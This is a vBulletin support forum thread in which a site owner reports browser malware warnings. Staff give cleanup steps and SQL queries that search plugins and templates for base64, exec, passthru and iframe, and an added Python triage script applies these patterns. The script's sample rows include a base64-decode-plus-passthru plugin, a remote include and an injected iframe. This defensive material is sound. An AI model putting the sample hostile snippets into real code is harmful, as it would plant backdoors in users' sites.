Warning: Something's Not Right Here!

  • LA-Aquarium
    New Member
    • Jul 2011
    • 26
    • 4.1.x

    [Forum] Warning: Something's Not Right Here!

    Hello, I am having a huge issue that has killed my website and caused my forum members not to return.. a malware detection keeps coming up.

    We upgraded to the latest version of VB, pruned all users to make sure none were spammers/hackers, and this malware message keeps coming up.

    "Warning: Something's Not Right Here!" page in red.

    this is the site it says has malware on and that our site has content from it. 5tt5555.acmetoy.com (it's not only this url, but others too) this is just the latest one.

    Please help.. I have never had this kind of issue with any other forum software and I have been dealing with nothing but spam and malware with VBulletin when it's the only software I have paid to use. I don't understand..


    URL to screenshot image of the malware message from Google Safe Browsing.

  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 74123

    #2
    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for step 4 and 5 -
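    -- passthru is the PHP function name; in LIKE, '_' matches exactly one
    -- character, so '%pass_thru%' on its own does not match it.
    SELECT title, phpcode, hookname, product FROM plugin
    WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%'
       OR phpcode LIKE '%pass_thru%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';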

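    7) Run this query:
    -- '%passthru%' added: '%pass_thru%' needs one character between "pass" and "thru".
    SELECT styleid, title, template FROM template
    WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%'
       OR template LIKE '%pass_thru%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';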

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API
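
An added example, not part of the original post or of vBulletin: a Python triage pass over rows exported by the two queries in post #2. It applies the iframe template allowlist from step 3 and matches call syntax, so substring hits such as "filesystem" are not flagged. The sample rows, plugin titles and the placeholder.invalid host are constructed for illustration.

```python
import re

# Templates that step 3 lists as legitimately containing iframe tags.
IFRAME_ALLOWED = frozenset({
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
})

# Indicators from steps 4-6. Call syntax is required for the exec family.
PATTERNS = {
    "base64": re.compile(r"base64", re.I),
    "exec": re.compile(r"\b(?:exec|system|pass_?thru)\s*\(", re.I),
    "include": re.compile(r"\b(?:include|require)(?:_once)?\b", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
}
PLUGIN_CHECKS = ("base64", "exec", "include", "iframe")
TEMPLATE_CHECKS = ("base64", "exec", "iframe")  # same set as the step 7 query

def scan(rows, checks, iframe_allowed=frozenset()):
    """Return {title: [matched checks]} for (title, code) rows needing review."""
    findings = {}
    for title, code in rows:
        hits = [name for name in checks if PATTERNS[name].search(code)]
        if title in iframe_allowed and "iframe" in hits:
            hits.remove("iframe")  # expected there per step 3
        if hits:
            findings[title] = hits
    return findings

# Constructed sample rows: (title, phpcode) and (title, template).
SAMPLE_PLUGINS = [
    ("Cache helper", "$path = DIR . '/filesystem_cache'; // execution time logged"),
    ("Footer stats", "$out = base64_decode($blob); passthru($out);"),
    ("Remote loader", "include_once('http://placeholder.invalid/x.php');"),
]
SAMPLE_TEMPLATES = [
    ("bbcode_video", '<iframe src="{vb:raw url}"></iframe>'),
    ("footer", '<div id="footer"></div><iframe src="http://placeholder.invalid/"></iframe>'),
    ("header", "<p>Operating system requirements</p>"),
]

if __name__ == "__main__":
    for kind, result in (("plugin", scan(SAMPLE_PLUGINS, PLUGIN_CHECKS)),
                         ("template", scan(SAMPLE_TEMPLATES, TEMPLATE_CHECKS, IFRAME_ALLOWED))):
        for title, hits in result.items():
            print(f"{kind}: {title}: {', '.join(hits)}")
```

Every flagged row still needs a manual read; a match is a reason to look, not proof of compromise.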


    • mmavipc
      New Member
      • Dec 2006
      • 14
      • 3.5.x

      #3

      The exact same thing happened to my forum today.
      None of the above steps revealed anything, it's not the yui connection js either.


      • punchbowl
        Senior Member
        • Nov 2006
        • 3903
        • 4.0.x

        #4
        Originally posted by mmavipc

        The exact same thing happened to my forum today.
        None of the above steps revealed anything, it's not the yui connection js either.
        If you get a warning on a specific page then search the page source for the domain name mentioned. Chances are it's just a hotlinked image. Well, that's what it's always been for my site.


        • mmavipc
          New Member
          • Dec 2006
          • 14
          • 3.5.x

          #5
          Nope, happens on all pages


          • LA-Aquarium
            New Member
            • Jul 2011
            • 26
            • 4.1.x

            #6
            Yeah, it happens on all pages, when I click on forum, threads or PM. Can I give access to a support staff member to help me? I don't have much experience with this.


            • TheNewOne
              Senior Member
              • Aug 2011
              • 1033
              • 4.2.5

              #7
              link to your site will see if it comes up for me


              • mmavipc
                New Member
                • Dec 2006
                • 14
                • 3.5.x

                #8
                It comes up for everyone.


                • mmavipc
                  New Member
                  • Dec 2006
                  • 14
                  • 3.5.x

                  #9
                  This seems to be the same issue as https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This


                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 74123

                    #10
                    Well, the "Attack Page" warning that is shown in the first post comes from the browser, not the webpage. It means the site has been reported as an attack page, not that it actually is an attack page or that it is compromised. Ask your hosting provider for a different IP address for your site. Does that clear up the issue?

                    Following the steps previously provided, I can't think of any way that someone could cause your site to be an exploit unless you're running software other than vBulletin, your DNS is compromised or the IP address is listed as the origins of an Attack Site. I receive no such warning when visiting LA-Aquarium's site though.

                    The other customer doesn't have accurate information on his customer account so his site cannot be looked at.

                    • TheNewOne
                      Senior Member
                      • Aug 2011
                      • 1033
                      • 4.2.5

                      #11
                      Originally posted by mmavipc
                      It comes up for everyone.
                      hard to say that as it does not come up for me as you still have not posted a link to your site


                      • LA-Aquarium
                        New Member
                        • Jul 2011
                        • 26
                        • 4.1.x

                        #12
                        my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.

                        So far today it has not come up, but it does this. It will go away for a day or two, then all of a sudden boom.. it's ugly and has ruined my forum..


                        • Wayne Luke
                          vBulletin Technical Support Lead
                          • Aug 2000
                          • 74123

                          #13
                          Originally posted by LA-Aquarium
                          my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.
                          I don't get a warning in either Chrome or Firefox.

                          • beishe8
                            Senior Member
                            • Oct 2005
                            • 6782
                            • 4.2.X

                            #14
                            Originally posted by LA-Aquarium
                            my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.

                            So far today it has not come up, but it does this. It will go away for a day or two, then all of a sudden boom.. it's ugly and has ruined my forum..
                            It is there as soon as I enter the forum.(Internet Explorer)

                            Is your Photo Gallery safe?


                            vB5 is unequivocally the best forum software, but not yet...


                            • LA-Aquarium
                              New Member
                              • Jul 2011
                              • 26
                              • 4.1.x

                              #15
                              Originally posted by beishe8
                              It is there as soon as I enter the forum.(Internet Explorer)

                              Is your Photo Gallery safe?
                              I would assume so, I don't see anything wrong with it. Why do you ask?
